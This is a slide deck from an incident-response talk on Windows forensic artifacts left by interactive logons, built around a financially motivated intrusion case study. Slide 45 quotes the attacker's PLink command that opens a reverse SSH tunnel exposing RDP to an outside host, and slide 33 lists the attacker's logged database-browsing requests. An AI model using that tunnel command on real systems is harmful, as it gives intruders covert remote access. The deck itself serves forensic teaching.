Malware on workstations is annoying enough, but when an attacker accesses your systems using remote desktop or other interactive software, you feel down right violated.
The presentation includes a technical dive into forensic artifacts generated during interactive logon sessions with multiple examples from real-life investigations. The presentation covers well known artifacts including MuiCache, UserAssist, and Windows Recycler, but also explores lesser known artifacts including the RDP Bitmap Cache, the Windows 10 Timeline, and Jumplists.
Speaker Bio:
Phillip Kealy is the Senior Manager for Incident Response for the Mandiant Denver and Phoenix offices and provides emergency services to clients when a security breach occurs. With over 15 years of experience in both private and public sector environments, Mr. Kealy has a background in incident response, security architecture, and networking
2. 2
Overview
§ Background
§ Disclaimer
§ Presentation Goals
§ Interactive Artifact Overview
§ Case Study + Interactive Artifacts
§ Scaling Investigations using Interactive Artifacts
3. 3
Background
§ Who am I?
§ Career
- Operational
- CIRT
- Security Manager
- Consulting
4. 4
DISCLAIMER
Case studies and examples are drawn from our
experiences and activities working for a variety of
customers, and do not represent our work for any
one customer or set of customers.
In many cases, facts have been changed to obscure
the identity of our customers and individuals
associated with our customers.
5. 5
Presentation Goals
§ Define Methods for Interactive Logons
§ Provide overview of available artifacts
§ Methods to use multiple evidence sources to
provide in-depth story
6. 6
What are Interactive artifacts?
§ Forensic Artifacts that record user activity during an interactive logon session
§ Examples of interactive logon sessions:
- Physically at the keyboard
- Remote Desktop
- Third Party Utilities
• Screen Connect
• VNC
• More
- PsExec
7. 7
User Profiles
What happens upon a user’s first interactive user logon?
§ Log Entries (More on this shortly)
§ Creation of user profile
- “C:users%USERNAME%”
- User registry hives
§ A user profile can prove an interactive logon occurred, even
without event log evidence
RDP
frank ITJumpServer
“C:usersfrank*” created
8. 8
Case Study – FIN9
§ Financially Motivated Attacker
§ Uses minimal malware for initial access and to
maintain presence
§ Exploits business processes and systems for
financial gain
9. 9
Targeted Attack Lifecycle – FIN9
• Phishing Email
• Word document with
macros
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• Dameware
• NanoCore
• MimiKatz
• Keystroke logging
• Fake Logon Screen
• Sticky Keys
• Built-in Windows Utilities
• Net commands
• File shares
• Search for systems of
interest
• Legitimate Access to
apps
• Direct DB access
using 1ClickDB
• Remote Desktop
• File Shares
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• SoftTokenCertificate
theft
11. 11
Initial Lead
§ Fraud Department located Unauthorized Gift Cards issued on January 22, 209
§ Suspicious rewards Database interaction on January 22, 2019 traced back to WebServerA
§ Live response analysis indicated attacker installed 1ClickDB via a remote desktop logon session
on WebServerA using Domain Admin account Frank
- RDP session to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC
from a system at an unknown IP address
§ IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of
ITJumpServer
- Connections to 1ClickDB webpage occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12
UTC
§ Now what?
- Live response analysis of WebServerA
12. 12
Windows Logon Events
Type 2 – Interactive
- Physical console
- Screen sharing
- “RunAs”
- PsExec
Type 10 – Remote Interactive
- Remote Desktop / Terminal Services
Type 7 – Credentials used to unlock screen
Type 12 – Cached remote interactive
Type 13 – Cached unlock
13. 13
Type 10 Logon – RDP
Unknown
System
An account was successfully logged
on.
User Name: franktheadmin
Domain: Rewards
Logon ID: (0x0,0x151F248)
Logon Type: 10
Logon Process: User32
Authentication Package: Negotiate
Workstation Name: ITJumpServer
Source Network Address: 192.168.1.101
RDP
“Rewards”
Domain
Controller
Security
Event Log
EID
4624
ITJumpServer
15. 15
User Registry Hives
Users<username>
Windows Vista/2008+
NTUSER.DAT
HKEY_USERS<User SID>_Classes
HKEY_USERS<User SID>
Users<username>AppDataLocalMicrosoftWindows
Windows Vista/2008+
USRCLASS.DAT
Registry Hive PathsRegistry Files on Disk
16. 16
LNK Files
§ Windows shortcut files
§ Auto-generated when file opened in Explorer
§ Supports “Recent Files” / “Recent Docs” functionality
Windows Vista, 7, Server 2008 – LNK File Paths
C:Users%USERNAME%AppDataRoamingMicrosoftWindowsRecent
C:Users%USERNAME%AppDataRoamingMicrosoftOfficeRecent
17. 17
Data within LNK Files
§ Full file path (local or network)
§ Attributes and logical size
§ MAC timestamps for the referenced file at the time it was last
opened
§ Output from
“lnkparse.py”
lnkparse.py -
sourceforge.net/projects
/jafat/files/lnk-parse/
18. 18
LNK File of interest
Date & Time Timestamp File Name
2019-01-22
01:39:23
Created C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk
Date & Time Timestamp
2019-01-22 01:36:23 Created, Modified,
Accessed
C:UsersdaveDesktopresult.txt
19. 19
Most Recently Used (MRU) Keys
“RecentDocs” Recently opened files Multiple Subkeys for file types
HKEY_USERS{SID}SoftwareMicrosoftWindowsCu
rrentVersionExplorerRecentDocs
.ini, .pem, .txt, .doc, .rdg, .zip, Folder,
etc.
§ Binary Format
§ Stores most recent 10 opened files
Key Last Write Registry Key Parsed MRU Value
2019-01-22
01:36:23
SoftwareMicrosoftWindowsCurrentVersionExpl
orerRecentDocs.txt
0 = result.txt
2019-01-22
01:35:34
SoftwareMicrosoftWindowsCurrentVersionExpl
orerRecentDocs.zip
0 = omg.zip
20. 20
Anatomy of a Registry Key
Example: Run key
Key: HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
Value Name: NotMalware
Value Data: C:ProgramDataTotallyMalwareEvil.exe
21. 21
Anatomy of a Registry Key
Example: Run key
Key Last Modified: 2017-06-05 19:33:51
§ Values inherit Last Modified time from their parent key
22. 22
A timestamp is applied to the ‘Key’, and is updated when…
1) Key created 2) Value created/deleted 3) Data of any Value is modified
Note: Registry timestamps can be modified, although this is not very common
Registry Timestamps
23. 23
Evidence of Execution
Default
Enabled
User Agnostic
All Windows
Versions
Execution
Visibility
ShimCache Yes Yes Yes Yes
AmCache Yes Yes No Yes
UserAssist Yes No Yes GUI only
MUICache Yes No Yes GUI only
Prefetch
Workstations
only
Yes Yes Yes
Windows
Events
No Yes Yes Yes
WMI RUA No Yes Yes Yes
24. 24
UserAssist and MUICache
Tracks files opened in Windows Explorer
HKCU{SID}SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist
HKCU{SID}SoftwareMicrosoftWindowsShellNoRoamMUICache
UserAssist
One value per executable file
• ROT13 encoded
Number of times each program ran
Last execution time
MUICache
One value per executable file
• Clear-text
Records “FileDescription” for PE files
27. 27
Decoded User Assist Data
Key Last Write Registry Key Times Executed
2019-01-22
01:36:23
{1AC14E77-02E7-4E5D-B744-
2EB1AE5198B7}msiexec.exe
1
2019-01-22
01:33:48
{1AC14E77-02E7-4E5D-B744-
2EB1AE5198B7}ServerManager.exe
1
2019-01-22
01:39:23
C:UsersdaveDesktopomg.exe 1
2019-01-22
01:43:23
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 1
2019-01-22
01:44:56
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 1
2019-01-22
02:28:01
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 3
28. 28
Jump Lists
§ Provides user quick access to recently used apps
§ Each user has their own jump lists
§ Shows evidence of accessed resources
§ Two types of jump lists
§ Requires parsing to be human readable
- JumpListParser, JLECmd, jmp
Automatic %APPDATA%MicrosoftWindowsRecentAutomaticDestinations
Custom %APPDATA%MicrosoftWindowsRecentCustomDestinations
29. 29
Jump Lists
§ Automatic – created automatically
when a user interacts with a
resource
• Custom – created when a
user “pins” an item
30. 30
Browser History, Cache, and Downloads
§ User Specific Artifact
§ Enumerate Browsers
§ Extract Browsing History
§ Collect Browser Cache
§ Collect Downloaded Files
31. 31
Web Server Side Data - Logging GET vs. POST
GET Requests
“Retrieve” content specified in the
request address
Key-value pairs passed as part of
URI
Fully captured in logs (cs-uri-query)
Impact: Malicious activity in POST requests can be hard to detect!
POST Requests
Tell the server to accept the data
enclosed in the packet contents
Key-value pairs passed in the
message body
Request parameters not logged
32. 32
Web Server Side Data - Content Encoding
§ Special characters in HTTP requests are URL Encoded
by the web browser
- % followed by ASCII character code
- Spaces can be represented by %20 or +
http://www.foo.com/search.aspx?name=John &
Mark Co.&op=1
…is converted to (and will be logged as)…
http://www.foo.com/search.aspx?name=
John%20%26%20Mark%20Co.&op=1
33. 33
GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG"
GET /images/Schema.asp
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=
("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=
("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS”
&sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_U
SERS"&
GET /images/Connect.asp
GET /images/Schema.asp
GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM>
_USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A=
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
34. 34
What do we know so far?
Time Source Details
2019-01-22 01:33:23EventLog
Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network
Address: 192.168.1.101
2019-01-22 01:33:23EventLog
Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network
Address: 192.168.1.101
2019-01-22 01:35:34Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.zip -> omg.zip
2019-01-22 01:39:03LNK:Create Time C:UsersdaveDesktopresults.txt (C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk)
2019-01-22 01:39:23FN:Create Time C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk
2019-01-22 01:39:23Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.txt -> result.txt
2019-01-22 01:39:23UserAssist:Dave C:UsersdaveDesktopomg.exe
2019-01-22 01:43:23UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc
2019-01-22 01:44:56UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe
2019-01-22 01:45:33IE:BrowserCache Earliest Browser Cache Artifact Created
2019-01-22 02:28:01UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe
2019-01-22 02:30:12IE:BrowserCache Most Recent Browser Artifact Modified
2019-01-22 02:39:45EventLog Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2
2019-01-22 02:39:45EventLog
Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source
Network Address: 192.168.1.101
§ What next?
39. 39
RDP Bitmap Cache Files
§ Store frequently used images used during RDP session
§ Improves user experience
§ Located at:
- C:Users<username>AppDataLocalMicrosoftTerminal Server
ClientCachebcache2.bmc
- C:Users<username>AppDataLocalMicrosoftTerminal Server
ClientCacheCache[0-9]{4}.bin
42. 42
Registry Shellbags
§ Windows Explorer usage
§ Records size, position, view of windows
§ Provides evidence of user access to local & remote directories
HKEY_USERS{SID}SoftwareMicrosoftWindowsShell
HKEY_USERS{SID}SoftwareMicrosoftWindowsShellNoRoam
Users<username>AppDataLocalMicrosoftWindows
Windows Vista/2008+
USRCLASS.DAT
43. 43
Registry Shellbags
Decoded shellbag keys can provide
- Paths to directories accessed via Explorer
- Date and time at which last access occurred
- MAC times of each path tracked in shellbags
Decoding tools
- RegRipper
- shellbags.py github.com/williballenthin/shellbags
- ShellBagsExplorer
• https://ericzimmerman.github.io/#!index.md
44. 44
ShellBags
MRU Time Modified Accessed Created Resource
2019-01-11 03:51:36 2018-12-30 02:59:32 2016-12-30 02:59:32 2017-11-05 14:40:54 My ComputerC:UsersITAdmin [Desktop0043]
2019-01-11 03:51:54 2018-05-07 15:54:36 2016-11-05 14:40:54 2017-11-05 14:40:54 My ComputerC:UsersITAdminAppData [Desktop00430]
My Network Placeshqdc1.comhqdc1.comgeneral [Desktop240]
2018-12-25 02:40:59 2012-11-11 17:00:06 2012-11-11 17:00:06 2012-11-11 17:00:06 My Network Placeshqdc1.comhqdc1.comgeneralDC01 [Desktop2400]
2018-12-25 02:40:59 2014-05-23 21:53:24 2018-05-23 21:53:24 2011-04-07 12:28:28 My Network Placeshqdc1.comhqdc1.comgeneralDC01ITIO Server Infrastructure [
2019-01-12 03:41:41 2017-01-10 14:07:12 2017-01-10 14:07:12 2017-05-02 13:45:42
My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktop
[Desktop290000]
2019-01-12 03:42:22
2017-01-11 18:42:04 2017-01-11 18:42:04 2017-01-10 14:06:56
My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopVDI
[Desktop2900000]
2019-01-12 03:47:49
2017-01-05 21:37:52 2017-01-05 21:37:52 2017-01-05 20:05:26
My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopAD Resumes
[Desktop2900001]
2019-01-12 03:41:42
2016-12-18 14:49:14 2016-12-18 14:49:14 2015-01-26 19:43:56
My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopMy Impo'tant
stuff [Desktop2900002]
2019-01-12 03:53:14 2016-12-15 20:57:58 2016-12-15 20:57:58 2016-11-24 22:18:00
My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopO365
[Desktop2900003]
2019-01-12 03:53:47 2015-09-23 13:52:10 2015-09-23 13:52:10 2016-05-02 13:45:42
My Network Places192.168.1.54192.168.1.54c$UsersfrankAppData
[Desktop290001]
2019-01-11 03:46:21 2016-09-27 13:38:42 2016-09-27 13:38:42 2016-05-02 13:45:42
My Network Places192.168.1.54192.168.1.54c$UsersfrankAppDataRoaming
[Desktop2900010]
45. 45
How did the attacker access the host?
§ Remotely installed ScreenConnect
§ Switched Tactics and removed
ScreenConnect/Installed malware
§ Non-Interactive malware used to download
and execute PLink.exe to create tunnel
- tunnel@<IP Address> -pw <Password> -P
443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389
§ Connected to local host using remote
desktop
Key Value Data
SoftwareSimonTatham
PuTTYSshHostKeys
rsa2@<IP Address> 0x10001,0x SSH Public Key
46. 46
Windows 10 Timeline
§ Timeline exists in Task View
- Accessed by hitting Win+Tab
§ Records timeline of user activity for specific applications
§ User Engaged
§ Generic Events
§ Database location:
- C:UsersUserAppDataLocalConnectedDevicesPlatformL.UserActivitiesCache.db